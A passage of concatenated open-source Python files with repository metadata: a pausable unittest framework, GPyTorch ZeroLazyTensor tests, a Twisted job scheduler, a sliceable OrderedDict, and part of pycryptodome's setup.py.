"alnum_prop": 0.7117669605212725,
"repo_name": "tuanvu216/udacity-course",
"id": "5dc3d4a8b93bbc6e97ba7ef3286a848b092674b6",
"size": "2628",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "intro_to_machine_learning/lesson/lesson_4_choose_your_own_algorithm/your_algorithm.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3736"
},
{
"name": "HTML",
"bytes": "143388"
},
{
"name": "JavaScript",
"bytes": "169689"
},
{
"name": "Jupyter Notebook",
"bytes": "3237655"
},
{
"name": "Python",
"bytes": "400129"
},
{
"name": "Ruby",
"bytes": "448"
},
{
"name": "Shell",
"bytes": "538"
}
],
"symlink_target": ""
} |
import unittest
import os
import os.path
import inspect
import functools
import contextlib
import traceback as traceback_lib
try:
import ctypes
except ImportError:
ctypes = None
import sys
try:
import stackless._wrap as stackless_wrap
except ImportError:
stackless_wrap = None
__pausable_unittest = True
def safe_repr(obj, max_length=100):
try:
result = repr(obj)
except Exception:
result = object.__repr__(obj)
if max_length is None or len(result) < max_length:
return result
return result[:max_length] + ' [truncated]...'
def _find_traceback_in_frame(frame):
if stackless_wrap and hasattr(stackless_wrap, "frame"):
# Really hacking code...
# See prickelpit.c
obj = stackless_wrap.frame.__reduce__(frame)
try:
for traceback in reversed(obj[-1][-1]):
if inspect.istraceback(traceback):
return traceback
except BaseException:
pass
return None
def _clear_locals_in_traceback(traceback, target_frames):
try:
frame = traceback.tb_frame
if frame is None or frame in target_frames:
return
new_hash = {}
for key in frame.f_locals:
new_hash[key] = None
if hasattr(ctypes, "pythonapi") and hasattr(ctypes.pythonapi,
"PyFrame_LocalsToFast"):
frame.f_locals.update(new_hash)
ctypes.pythonapi.PyFrame_LocalsToFast(ctypes.py_object(frame),
ctypes.c_int(0))
elif '__pypy__' in sys.builtin_module_names:
import __pypy__
if hasattr(__pypy__, "locals_to_fast"):
frame.f_locals.update(new_hash)
__pypy__.locals_to_fast(frame)
finally:
del frame
def _clear_unnecessary_locals():
# For Stackless Python 3.6
if hasattr(traceback_lib, "clear_frames"):
traceback = sys.exc_info()[2]
if traceback:
traceback_lib.clear_frames(traceback)
return
# For Stackless Python 2.7
frame = inspect.currentframe().f_back
target_frames = []
try:
tag_to_detect_bottom_of_stack = "_tag_for_clear_unnecessary_locals"
while frame:
locals_hash = frame.f_locals
if locals_hash and tag_to_detect_bottom_of_stack in locals_hash:
break
target_frames.append(frame)
frame = frame.f_back
traceback = sys.exc_info()[2]
try:
if traceback:
while traceback:
_clear_locals_in_traceback(traceback, target_frames)
traceback = traceback.tb_next
for frame in target_frames:
traceback = _find_traceback_in_frame(frame)
while traceback:
_clear_locals_in_traceback(traceback, target_frames)
traceback = traceback.tb_next
finally:
del traceback
finally:
del frame
del target_frames
def log_assertion1(method_name):
u"""
Wrapper method to log assertion.
    This wrapper expects that the method takes 1 parameter plus a msg parameter.
"""
method = getattr(unittest.TestCase, method_name)
@functools.wraps(method)
def wrapper(self, arg, msg=None):
error = False
log_assertion_calling = self._log_assertion_calling
if msg is None:
msg = safe_repr(arg, self._msg_repr_max_length)
else:
msg = "%s (%s)" % (msg, safe_repr(arg, self._msg_repr_max_length))
try:
self._log_assertion_calling = True
method(self, arg, msg)
except BaseException:
error = True
raise
finally:
if not error and not log_assertion_calling:
frame = inspect.currentframe().f_back
self.log_for_assertion(
method_name, frame.f_lineno,
os.path.basename(frame.f_code.co_filename), msg)
self._log_assertion_calling = log_assertion_calling
return wrapper
def log_assertion2(method_name):
u"""
Wrapper method to log assertion.
    This wrapper expects that the method takes 2 parameters plus a msg parameter.
"""
method = getattr(unittest.TestCase, method_name)
@functools.wraps(method)
def wrapper(self, first, second, msg=None):
error = False
log_assertion_calling = self._log_assertion_calling
if msg is None:
msg = "%s, %s" % (safe_repr(first, self._msg_repr_max_length),
safe_repr(second, self._msg_repr_max_length))
else:
msg = "%s (%s, %s)" % (
msg, safe_repr(first, self._msg_repr_max_length),
safe_repr(second, self._msg_repr_max_length))
try:
self._log_assertion_calling = True
method(self, first, second, msg)
except BaseException:
error = True
raise
finally:
if not error and not log_assertion_calling:
frame = inspect.currentframe().f_back
self.log_for_assertion(
method_name, frame.f_lineno,
os.path.basename(frame.f_code.co_filename), msg)
self._log_assertion_calling = log_assertion_calling
return wrapper
def log_assertion_almost(method_name):
u"""
Wrap assertAlmostEqual and assertNotAlmostEqual.
"""
import functools
method = getattr(unittest.TestCase, method_name)
@functools.wraps(method)
def wrapper(self, first, second, places=7, msg=None, delta=None):
error = False
log_assertion_calling = self._log_assertion_calling
if msg is None:
msg = "%s, %s" % (safe_repr(first, self._msg_repr_max_length),
safe_repr(second, self._msg_repr_max_length))
else:
msg = "%s (%s, %s)" % (
msg, safe_repr(first, self._msg_repr_max_length),
safe_repr(second, self._msg_repr_max_length))
try:
self._log_assertion_calling = True
return method(self, first, second, places, msg, delta)
except BaseException:
error = True
raise
finally:
if not error and not log_assertion_calling:
frame = inspect.currentframe().f_back
self.log_for_assertion(
method_name, frame.f_lineno,
os.path.basename(frame.f_code.co_filename), msg)
self._log_assertion_calling = log_assertion_calling
return wrapper
class TestCase(unittest.TestCase):
def run(self, result):
_tag_for_clear_unnecessary_locals = None
self.__result = result
self.__pause_forwarder = result.pause_forwarder
self.__logger = result.logger
self.assertion_log = result.assertion_log
self._log_assertion_calling = False
self.options = result._options
if self.options is not None and "msg_repr_max_length" in self.options:
self._msg_repr_max_length = self.options["msg_repr_max_length"]
else:
self._msg_repr_max_length = 100
super(TestCase, self).run(result)
assert _tag_for_clear_unnecessary_locals is None
def subTest(self, msg="subtest", **params):
return super(TestCase, self).subTest(msg, **params)
def pause(self, info=None):
self.__result.before_pause(info)
status = self._extra_status()
_clear_unnecessary_locals()
try:
self.__pause_forwarder.pause(info)
finally:
self._restore_extra_status(status)
self.__result.after_pause(info)
def call_pauser_callback(self, action, info=None):
return self.__pause_forwarder.exec_callback(action, info)
def _extra_status(self):
status = {}
status["cwd"] = os.path.abspath(os.getcwd())
return status
def _restore_extra_status(self, status):
try:
os.chdir(status["cwd"])
except BaseException:
self.logger.error("Cannot change directory to '%s'.",
status["cwd"])
@property
def logger(self):
return self.__logger
@staticmethod
def add_action(method_name, method):
setattr(TestCase, method_name, method)
def log_for_assertion(self, method_name, lineno, filename, message):
if self.assertion_log:
text = "success %s (L%d in '%s')" % (method_name, lineno, filename)
if message is not None:
text += ": %s" % message
self.logger.info(text)
def assertRaises(self, excClass, callableObj=None, *args, **kwargs):
frame = inspect.currentframe().f_back
lineno = frame.f_lineno
filename = frame.f_code.co_filename
if (not callable(callableObj)) and (not args) and (not kwargs):
@contextlib.contextmanager
def helper():
error = False
msg = callableObj
try:
with super(TestCase, self).assertRaises(excClass) as cm:
yield cm
except BaseException:
error = True
raise
finally:
if not error:
self.log_for_assertion("assertRaises", lineno,
os.path.basename(filename), msg)
return helper()
else:
error = False
try:
super(TestCase, self).assertRaises(excClass, callableObj,
*args, **kwargs)
except BaseException:
error = True
raise
finally:
if not error:
self.log_for_assertion("assertRaises", lineno,
os.path.basename(filename), None)
def assertRaisesRegexp(self,
excClass,
regexp,
callableObj=None,
*args,
**kwargs):
frame = inspect.currentframe().f_back
lineno = frame.f_lineno
filename = frame.f_code.co_filename
if (not callable(callableObj)) and (not args) and (not kwargs):
@contextlib.contextmanager
def helper():
error = False
msg = callableObj
try:
with super(TestCase,
self).assertRaisesRegexp(excClass,
regexp) as cm:
yield cm
except BaseException:
error = True
raise
finally:
if not error:
self.log_for_assertion("assertRaisesRegexp", lineno,
os.path.basename(filename), msg)
return helper()
else:
error = False
try:
super(TestCase,
self).assertRaisesRegexp(excClass, regexp, callableObj,
*args, **kwargs)
except BaseException:
error = True
raise
finally:
if not error:
self.log_for_assertion("assertRaisesRegexp", lineno,
os.path.basename(filename), None)
# 1 parameter
for name in ("assertTrue", "assertFalse", "assertIsNone", "assertIsNotNone"):
setattr(TestCase, name, log_assertion1(name))
# 2 parameters
for name in (
"assertEqual",
"assertNotEqual",
"assertIs",
"assertIsNot",
"assertIn",
"assertNotIn",
"assertIsInstance",
"assertNotIsInstance",
"assertGreater",
"assertGreaterEqual",
"assertLess",
"assertLessEqual",
("assertRegexpMatches", "assertRegex"),
("assertNotRegexpMatches", "assertNotRegex"),
("assertItemsEqual", None),
("assertDictContainsSubset", None),
"assertMultiLineEqual",
"assertSequenceEqual",
"assertListEqual",
"assertTupleEqual",
"assertSetEqual",
"assertDictEqual",
):
if isinstance(name, tuple):
if hasattr(unittest.TestCase, name[0]):
setattr(TestCase, name[0], log_assertion2(name[0]))
elif name[1] is not None:
setattr(TestCase, name[1], log_assertion2(name[1]))
else:
setattr(TestCase, name, log_assertion2(name))
# assertAlmostEqual(first, second, places=7, msg=None, delta=None)
# assertNotAlmostEqual(first, second, places=7, msg=None, delta=None)
for name in ("assertAlmostEqual", "assertNotAlmostEqual"):
setattr(TestCase, name, log_assertion_almost(name))
| {
"content_hash": "82cb58d1ce9788ca82c7558f5b0a072f",
"timestamp": "",
"source": "github",
"line_count": 391,
"max_line_length": 79,
"avg_line_length": 34.74168797953964,
"alnum_prop": 0.5256919905771495,
"repo_name": "masamitsu-murase/pausable_unittest",
"id": "7b867ad14eed814eb6d7961a48eb25d013c45568",
"size": "13609",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "pausable_unittest/testcase.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "2883"
},
{
"name": "Python",
"bytes": "62179"
},
{
"name": "Shell",
"bytes": "2079"
}
],
"symlink_target": ""
} |
import unittest
import torch
from gpytorch.lazy import ZeroLazyTensor
from gpytorch.test.utils import approx_equal
class TestZeroLazyTensor(unittest.TestCase):
def test_evaluate(self):
lv = ZeroLazyTensor(5, 4, 3)
actual = torch.zeros(5, 4, 3)
res = lv.evaluate()
self.assertLess(torch.norm(res - actual), 1e-4)
def test_getitem(self):
lv = ZeroLazyTensor(5, 4, 3)
res_one = lv[0].evaluate()
self.assertLess(torch.norm(res_one - torch.zeros(4, 3)), 1e-4)
res_two = lv[:, 1, :]
self.assertLess(torch.norm(res_two - torch.zeros(5, 3)), 1e-4)
res_three = lv[:, :, 2]
self.assertLess(torch.norm(res_three - torch.zeros(5, 4)), 1e-4)
def test_getitem_complex(self):
lv = ZeroLazyTensor(5, 4, 3)
res_one = lv[[0, 1]].evaluate()
self.assertLess(torch.norm(res_one - torch.zeros(2, 4, 3)), 1e-4)
res_two = lv[:, [0, 1], :].evaluate()
self.assertLess(torch.norm(res_two - torch.zeros(5, 2, 3)), 1e-4)
res_three = lv[:, :, [0, 2]].evaluate()
self.assertLess(torch.norm(res_three - torch.zeros(5, 4, 2)), 1e-4)
def test_getitem_ellipsis(self):
lv = ZeroLazyTensor(5, 4, 3)
res_one = lv[[0, 1]].evaluate()
self.assertLess(torch.norm(res_one - torch.zeros(2, 4, 3)), 1e-4)
res_two = lv[:, [0, 1], ...].evaluate()
self.assertLess(torch.norm(res_two - torch.zeros(5, 2, 3)), 1e-4)
res_three = lv[..., [0, 2]].evaluate()
self.assertLess(torch.norm(res_three - torch.zeros(5, 4, 2)), 1e-4)
def test_get_item_tensor_index(self):
# Tests the default LV.__getitem__ behavior
lazy_tensor = ZeroLazyTensor(5, 5)
evaluated = lazy_tensor.evaluate()
index = (torch.tensor([0, 0, 1, 2]), torch.tensor([0, 1, 0, 2]))
self.assertTrue(approx_equal(lazy_tensor[index], evaluated[index]))
index = (torch.tensor([0, 0, 1, 2]), slice(None, None, None))
self.assertTrue(approx_equal(lazy_tensor[index].evaluate(), evaluated[index]))
index = (slice(None, None, None), torch.tensor([0, 0, 1, 2]))
self.assertTrue(approx_equal(lazy_tensor[index].evaluate(), evaluated[index]))
index = (Ellipsis, slice(None, None, None), torch.tensor([0, 0, 1, 2]))
self.assertTrue(approx_equal(lazy_tensor[index].evaluate(), evaluated[index]))
index = (Ellipsis, torch.tensor([0, 0, 1, 2]))
self.assertTrue(approx_equal(lazy_tensor[index].evaluate(), evaluated[index]))
def test_get_item_tensor_index_on_batch(self):
# Tests the default LV.__getitem__ behavior
lazy_tensor = ZeroLazyTensor(3, 5, 5)
evaluated = lazy_tensor.evaluate()
index = (torch.tensor([0, 1, 1, 0]), torch.tensor([0, 1, 0, 2]), torch.tensor([1, 2, 0, 1]))
self.assertTrue(approx_equal(lazy_tensor[index], evaluated[index]))
index = (torch.tensor([0, 1, 1, 0]), torch.tensor([0, 1, 0, 2]), slice(None, None, None))
self.assertTrue(approx_equal(lazy_tensor[index], evaluated[index]))
index = (torch.tensor([0, 1, 1]), slice(None, None, None), torch.tensor([0, 1, 2]))
self.assertTrue(approx_equal(lazy_tensor[index], evaluated[index]))
index = (slice(None, None, None), torch.tensor([0, 1, 1, 0]), torch.tensor([0, 1, 0, 2]))
self.assertTrue(approx_equal(lazy_tensor[index], evaluated[index]))
index = (torch.tensor([0, 0, 1, 1]), slice(None, None, None), slice(None, None, None))
self.assertTrue(approx_equal(lazy_tensor[index].evaluate(), evaluated[index]))
index = (slice(None, None, None), torch.tensor([0, 0, 1, 2]), torch.tensor([0, 0, 1, 1]))
self.assertTrue(approx_equal(lazy_tensor[index], evaluated[index]))
index = (torch.tensor([0, 1, 1, 0]), torch.tensor([0, 1, 0, 2]), slice(None, None, None))
self.assertTrue(approx_equal(lazy_tensor[index], evaluated[index]))
index = (torch.tensor([0, 0, 1, 0]), slice(None, None, None), torch.tensor([0, 0, 1, 1]))
self.assertTrue(approx_equal(lazy_tensor[index], evaluated[index]))
index = (Ellipsis, torch.tensor([0, 1, 1, 0]))
self.assertTrue(approx_equal(lazy_tensor[index].evaluate(), evaluated[index]))
def test_add_diag(self):
diag = torch.tensor(1.5)
res = ZeroLazyTensor(5, 5).add_diag(diag).evaluate()
actual = torch.eye(5).mul(1.5)
self.assertTrue(approx_equal(res, actual))
diag = torch.tensor([1.5])
res = ZeroLazyTensor(5, 5).add_diag(diag).evaluate()
actual = torch.eye(5).mul(1.5)
self.assertTrue(approx_equal(res, actual))
diag = torch.tensor([1.5, 1.3, 1.2, 1.1, 2.0])
res = ZeroLazyTensor(5, 5).add_diag(diag).evaluate()
actual = diag.diag()
self.assertTrue(approx_equal(res, actual))
diag = torch.tensor(1.5)
res = ZeroLazyTensor(2, 5, 5).add_diag(diag).evaluate()
actual = torch.eye(5).unsqueeze(0).repeat(2, 1, 1).mul(1.5)
self.assertTrue(approx_equal(res, actual))
diag = torch.tensor([1.5])
res = ZeroLazyTensor(2, 5, 5).add_diag(diag).evaluate()
actual = torch.eye(5).unsqueeze(0).repeat(2, 1, 1).mul(1.5)
self.assertTrue(approx_equal(res, actual))
diag = torch.tensor([1.5, 1.3, 1.2, 1.1, 2.0])
res = ZeroLazyTensor(2, 5, 5).add_diag(diag).evaluate()
actual = diag.diag().unsqueeze(0).repeat(2, 1, 1)
self.assertTrue(approx_equal(res, actual))
diag = torch.tensor([[1.5, 1.3, 1.2, 1.1, 2.0], [0, 1, 2, 1, 1]])
res = ZeroLazyTensor(2, 5, 5).add_diag(diag).evaluate()
actual = torch.cat([diag[0].diag().unsqueeze(0), diag[1].diag().unsqueeze(0)])
self.assertTrue(approx_equal(res, actual))
if __name__ == "__main__":
unittest.main()
| {
"content_hash": "4f4af1e53f8a376a13524aa44c17193d",
"timestamp": "",
"source": "github",
"line_count": 124,
"max_line_length": 100,
"avg_line_length": 47.37903225806452,
"alnum_prop": 0.5962553191489361,
"repo_name": "jrg365/gpytorch",
"id": "cba98bb733b30210dad987c21d86ba1458b2a104",
"size": "5899",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/lazy/test_zero_lazy_tensor.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "6005"
},
{
"name": "C++",
"bytes": "242"
},
{
"name": "Python",
"bytes": "338860"
}
],
"symlink_target": ""
} |
"""Schedules."""
import time
import random
from heapq import heappush, heappop
from twisted.internet import task
from ..components import *
from ..metacomponents import *
import logging
from .base import MetaComponent
logger = logging.getLogger(__name__)
class Scheduler(MetaComponent):
heap = []
allow_clients = False
enqueueloop = None
redistribute = True
enqueuing = False
def __init__(self, server, config, server_mode, queue, **kwargs):
self.queue = queue
super(Scheduler, self).__init__(server, server_mode)
def start(self):
self.enqueueloop = task.LoopingCall(self.enqueue)
self.enqueueloop.start(1)
def shutdown(self):
if self.enqueueloop:
self.enqueueloop.stop()
def is_valid(self, item):
return True
def add(self, item, interval):
if interval == 0:
return
enqueue_time = int(time.time() + random.randint(0, interval))
heappush(self.heap, (enqueue_time, (item, interval)))
def enqueue(self):
# Enqueue jobs
now = int(time.time())
# Compare the heap min timestamp with now().
# If it's time for the item to be queued, pop it, update the
# timestamp and add it back to the heap for the next go round.
if not self.enqueuing:
self.enqueuing = True
i = 0
logger.debug(len(self.heap))
while self.heap and self.heap[0][0] < now:
if self.queue.queue_size > 100000 and self.redistribute:
enqueue_time, (item, interval) = heappop(self.heap)
distribution = random.randint(-1 * interval / 2, interval / 2)
heappush(self.heap, (now + interval + distribution, (item, interval)))
else:
                    enqueue_time, (item, interval) = heappop(self.heap)  # each heap entry is (enqueue_time, (item, interval))
i += 1
if self.is_valid(item):
# support for complex types, just set 'bytes'
if hasattr(item, 'bytes'):
self.queue.publish(item.bytes)
else:
self.queue.publish(item)
heappush(self.heap, (now + interval, (item, interval)))
if hasattr(item, 'type'):
self.server.stats.increment('scheduler.job.%s' % (item.type.replace('/', '.')), 0.1)
if i:
logger.debug("Added %s items to the queue." % i)
self.enqueuing = False
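# Rough sketch of the scheduling behaviour with hypothetical numbers: add(item, 60)
# pushes (now + random offset in [0, 60], (item, 60)) onto the heap; each enqueue()
# pass (run once per second) pops entries whose timestamp has passed, publishes them
# to the queue and re-pushes them roughly one interval into the future, spreading
# them out further whenever the queue backlog exceeds 100000 and redistribution is on.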
| {
"content_hash": "ef4b5c5d6bea60b865ea3472bd3506f6",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 112,
"avg_line_length": 35.986301369863014,
"alnum_prop": 0.5496764370003807,
"repo_name": "hiidef/hiispider",
"id": "5fa73d560622e9d7b6ebaf178f74d05bf6b59edf",
"size": "2674",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hiispider/metacomponents/scheduler.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "532169"
},
{
"name": "Shell",
"bytes": "787"
}
],
"symlink_target": ""
} |
import collections
class SliceableDict(collections.OrderedDict):
def __getitem__(self, key):
stop_offset = 0
if isinstance(key, tuple):
key, stop_offset = key
if isinstance(key, slice):
return self.values()[self.__calculate_slice(key, stop_offset)]
return super(SliceableDict, self).__getitem__(key)
def __calculate_slice(self, key, stop_offset=0):
start, stop, step = key.start, key.stop, key.step
if start:
start = next(
i for i, (k, v) in enumerate(self.items())
if k == start
)
if stop:
stop = next(
i for i, (k, v) in enumerate(self.items())
if k == stop
) + stop_offset
return slice(start, stop, step)
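# Hypothetical usage sketch (assumes dict.values() is subscriptable, i.e. Python 2;
# on Python 3 the slicing branch would need list(self.values()) instead):
#   d = SliceableDict([('a', 1), ('b', 2), ('c', 3), ('d', 4)])
#   d['a']         # -> 1          plain key lookup still works
#   d['b':'d']     # -> [2, 3]     slice by key, stop key exclusive
#   d['b':'d', 1]  # -> [2, 3, 4]  the tuple form adds a stop offset, making it inclusive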
| {
"content_hash": "b69e6cadd28522c18565224b06fff21a",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 74,
"avg_line_length": 26.612903225806452,
"alnum_prop": 0.52,
"repo_name": "mivdnber/roetsjbaan",
"id": "813a8dd332912a95f0af250de0e2fda6d0e5a2bd",
"size": "825",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "roetsjbaan/datatypes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "11201"
}
],
"symlink_target": ""
} |
from __future__ import print_function
try:
from setuptools import Extension, Command, setup
except ImportError:
from distutils.core import Extension, Command, setup
from distutils.command.build_ext import build_ext
from distutils.command.build_py import build_py
import re
import os
import sys
import shutil
import struct
from compiler_opt import set_compiler_options
use_separate_namespace = os.path.isfile(".separate_namespace")
project_name = "pycryptodome"
package_root = "Crypto"
other_project = "pycryptodomex"
other_root = "Cryptodome"
if use_separate_namespace:
project_name, other_project = other_project, project_name
package_root, other_root = other_root, package_root
longdesc = """
PyCryptodome
============
PyCryptodome is a self-contained Python package of low-level
cryptographic primitives.
It supports Python 2.6 and 2.7, Python 3.4 and newer, and PyPy.
You can install it with::
pip install THIS_PROJECT
All modules are installed under the ``THIS_ROOT`` package.
Check the OTHER_PROJECT_ project for the equivalent library that
works under the ``OTHER_ROOT`` package.
PyCryptodome is a fork of PyCrypto. It brings several enhancements
with respect to the last official version of PyCrypto (2.6.1),
for instance:
* Authenticated encryption modes (GCM, CCM, EAX, SIV, OCB)
* Accelerated AES on Intel platforms via AES-NI
* First class support for PyPy
* Elliptic curves cryptography (NIST P-256, P-384 and P-521 curves only)
* Better and more compact API (`nonce` and `iv` attributes for ciphers,
automatic generation of random nonces and IVs, simplified CTR cipher mode,
and more)
* SHA-3 (including SHAKE XOFs) and BLAKE2 hash algorithms
* Salsa20 and ChaCha20 stream ciphers
* scrypt and HKDF
* Deterministic (EC)DSA
* Password-protected PKCS#8 key containers
* Shamir's Secret Sharing scheme
* Random numbers get sourced directly from the OS (and not from a CSPRNG in userspace)
* Simplified install process, including better support for Windows
* Cleaner RSA and DSA key generation (largely based on FIPS 186-4)
* Major clean ups and simplification of the code base
PyCryptodome is not a wrapper to a separate C library like *OpenSSL*.
To the largest possible extent, algorithms are implemented in pure Python.
Only the pieces that are extremely critical to performance (e.g. block ciphers)
are implemented as C extensions.
For more information, see the `homepage`_.
All the code can be downloaded from `GitHub`_.
.. _OTHER_PROJECT: https://pypi.python.org/pypi/OTHER_PROJECT
.. _`homepage`: http://www.pycryptodome.org
.. _GitHub: https://github.com/Legrandin/pycryptodome
""".replace("THIS_PROJECT", project_name).\
replace("THIS_ROOT", package_root).\
replace("OTHER_PROJECT", other_project).\
replace("OTHER_ROOT", other_root)
class PCTBuildExt (build_ext):
# Avoid linking Python's dynamic library
def get_libraries(self, ext):
return []
class PCTBuildPy(build_py):
def find_package_modules(self, package, package_dir, *args, **kwargs):
modules = build_py.find_package_modules(self, package, package_dir,
*args, **kwargs)
# Exclude certain modules
retval = []
for item in modules:
pkg, module = item[:2]
retval.append(item)
return retval
class TestCommand(Command):
"Run self-test"
# Long option name, short option name, description
user_options = [
('skip-slow-tests', None, 'Skip slow tests'),
('wycheproof-warnings', None, 'Show warnings from wycheproof tests'),
('module=', 'm', 'Test a single module (e.g. Cipher, PublicKey)'),
]
def initialize_options(self):
self.build_dir = None
self.skip_slow_tests = None
self.wycheproof_warnings = None
self.module = None
def finalize_options(self):
self.set_undefined_options('install', ('build_lib', 'build_dir'))
self.config = {'slow_tests': not self.skip_slow_tests,
'wycheproof_warnings': self.wycheproof_warnings}
def run(self):
# Run sub commands
for cmd_name in self.get_sub_commands():
self.run_command(cmd_name)
# Run SelfTest
old_path = sys.path[:]
self.announce("running self-tests on " + package_root)
try:
sys.path.insert(0, self.build_dir)
if use_separate_namespace:
from Cryptodome import SelfTest
from Cryptodome.Math import Numbers
else:
from Crypto import SelfTest
from Crypto.Math import Numbers
moduleObj = None
if self.module:
if self.module.count('.') == 0:
# Test a whole a sub-package
full_module = package_root + ".SelfTest." + self.module
module_name = self.module
else:
# Test only a module
# Assume only one dot is present
comps = self.module.split('.')
module_name = "test_" + comps[1]
full_module = package_root + ".SelfTest." + comps[0] + "." + module_name
# Import sub-package or module
moduleObj = __import__(full_module, globals(), locals(), module_name)
print(package_root + ".Math implementation:",
str(Numbers._implementation))
SelfTest.run(module=moduleObj, verbosity=self.verbose, stream=sys.stdout, config=self.config)
finally:
# Restore sys.path
sys.path[:] = old_path
# Run slower self-tests
self.announce("running extended self-tests")
sub_commands = [('build', None)]
def create_cryptodome_lib():
assert os.path.isdir("lib/Crypto")
try:
shutil.rmtree("lib/Cryptodome")
except OSError:
pass
for root_src, dirs, files in os.walk("lib/Crypto"):
root_dst, nr_repl = re.subn('Crypto', 'Cryptodome', root_src)
assert nr_repl == 1
for dir_name in dirs:
full_dir_name_dst = os.path.join(root_dst, dir_name)
if not os.path.exists(full_dir_name_dst):
os.makedirs(full_dir_name_dst)
for file_name in files:
full_file_name_src = os.path.join(root_src, file_name)
full_file_name_dst = os.path.join(root_dst, file_name)
print("Copying file %s to %s" % (full_file_name_src, full_file_name_dst))
shutil.copy2(full_file_name_src, full_file_name_dst)
if full_file_name_src.split(".")[-1] not in ("py", "pyi"):
if full_file_name_src != "py.typed":
continue
if sys.version_info[0] > 2:
extra_param = { "encoding": "utf-8" }
else:
extra_param = {}
with open(full_file_name_dst, "rt", **extra_param) as fd:
content = (fd.read().
replace("Crypto.", "Cryptodome.").
replace("Crypto ", "Cryptodome ").
replace("'Crypto'", "'Cryptodome'").
replace('"Crypto"', '"Cryptodome"'))
os.remove(full_file_name_dst)
with open(full_file_name_dst, "wt", **extra_param) as fd:
fd.write(content)
# Parameters for setup
packages = [
"Crypto",
"Crypto.Cipher",
"Crypto.Hash",
"Crypto.IO",
"Crypto.PublicKey",
"Crypto.Protocol",
"Crypto.Random",
"Crypto.Signature",
"Crypto.Util",
"Crypto.Math",
"Crypto.SelfTest",
"Crypto.SelfTest.Cipher",
"Crypto.SelfTest.Hash",
"Crypto.SelfTest.IO",
"Crypto.SelfTest.Protocol",
"Crypto.SelfTest.PublicKey",
"Crypto.SelfTest.Random",
"Crypto.SelfTest.Signature",
"Crypto.SelfTest.Util",
"Crypto.SelfTest.Math",
]
package_data = {
"Crypto" : [ "py.typed", "*.pyi" ],
"Crypto.Cipher" : [ "*.pyi" ],
"Crypto.Hash" : [ "*.pyi" ],
"Crypto.Math" : [ "*.pyi" ],
"Crypto.Protocol" : [ "*.pyi" ],
"Crypto.PublicKey" : [ "*.pyi" ],
"Crypto.Random" : [ "*.pyi" ],
"Crypto.Signature" : [ "*.pyi" ],
"Crypto.IO" : [ "*.pyi" ],
"Crypto.Util" : [ "*.pyi" ],
"Crypto.SelfTest.Cipher" : [
"test_vectors/AES/*.*",
"test_vectors/TDES/*.*",
"test_vectors/wycheproof/*.*",
],
"Crypto.SelfTest.Hash" : [
"test_vectors/SHA1/*.*",
"test_vectors/SHA2/*.*",
"test_vectors/SHA3/*.*",
"test_vectors/keccak/*.*",
"test_vectors/BLAKE2s/*.*",
"test_vectors/BLAKE2b/*.*",
"test_vectors/wycheproof/*.*",
],
"Crypto.SelfTest.Signature" : [
"test_vectors/DSA/*.*",
"test_vectors/ECDSA/*.*",
"test_vectors/PKCS1-v1.5/*.*",
"test_vectors/PKCS1-PSS/*.*",
"test_vectors/wycheproof/*.*",
],
"Crypto.SelfTest.PublicKey" : [
"test_vectors/ECC/*.*",
"test_vectors/RSA/*.*",
],
"Crypto.SelfTest.Protocol" : [
"test_vectors/wycheproof/*.*",
],
}
ext_modules = [
# Hash functions
Extension("Crypto.Hash._MD2",
include_dirs=['src/'],
sources=["src/MD2.c"]),
Extension("Crypto.Hash._MD4",
include_dirs=['src/'],
sources=["src/MD4.c"]),
Extension("Crypto.Hash._MD5",
include_dirs=['src/'],
sources=["src/MD5.c"]),
Extension("Crypto.Hash._SHA1",
include_dirs=['src/'],
sources=["src/SHA1.c"]),
Extension("Crypto.Hash._SHA256",
include_dirs=['src/'],
sources=["src/SHA256.c"]),
Extension("Crypto.Hash._SHA224",
include_dirs=['src/'],
sources=["src/SHA224.c"]),
Extension("Crypto.Hash._SHA384",
include_dirs=['src/'],
sources=["src/SHA384.c"]),
Extension("Crypto.Hash._SHA512",
include_dirs=['src/'],
sources=["src/SHA512.c"]),
Extension("Crypto.Hash._RIPEMD160",
include_dirs=['src/'],
sources=["src/RIPEMD160.c"]),
Extension("Crypto.Hash._keccak",
include_dirs=['src/'],
sources=["src/keccak.c"]),
Extension("Crypto.Hash._BLAKE2b",
include_dirs=['src/'],
sources=["src/blake2b.c"]),
Extension("Crypto.Hash._BLAKE2s",
include_dirs=['src/'],
sources=["src/blake2s.c"]),
Extension("Crypto.Hash._ghash_portable",
include_dirs=['src/'],
sources=['src/ghash_portable.c']),
Extension("Crypto.Hash._ghash_clmul",
include_dirs=['src/'],
sources=['src/ghash_clmul.c']),
# MACs
Extension("Crypto.Hash._poly1305",
include_dirs=['src/'],
sources=["src/poly1305.c"]),
# Block encryption algorithms
Extension("Crypto.Cipher._raw_aes",
include_dirs=['src/'],
sources=["src/AES.c"]),
Extension("Crypto.Cipher._raw_aesni",
include_dirs=['src/'],
sources=["src/AESNI.c"]),
Extension("Crypto.Cipher._raw_arc2",
include_dirs=['src/'],
sources=["src/ARC2.c"]),
Extension("Crypto.Cipher._raw_blowfish",
include_dirs=['src/'],
sources=["src/blowfish.c"]),
Extension("Crypto.Cipher._raw_eksblowfish",
include_dirs=['src/'],
define_macros=[('EKS',None),],
sources=["src/blowfish.c"]),
Extension("Crypto.Cipher._raw_cast",
include_dirs=['src/'],
sources=["src/CAST.c"]),
Extension("Crypto.Cipher._raw_des",
include_dirs=['src/', 'src/libtom/'],
sources=["src/DES.c"]),
Extension("Crypto.Cipher._raw_des3",
include_dirs=['src/', 'src/libtom/'],
sources=["src/DES3.c"]),
Extension("Crypto.Util._cpuid_c",
include_dirs=['src/'],
sources=['src/cpuid.c']),
# Chaining modes
Extension("Crypto.Cipher._raw_ecb",
include_dirs=['src/'],
sources=["src/raw_ecb.c"]),
Extension("Crypto.Cipher._raw_cbc",
include_dirs=['src/'],
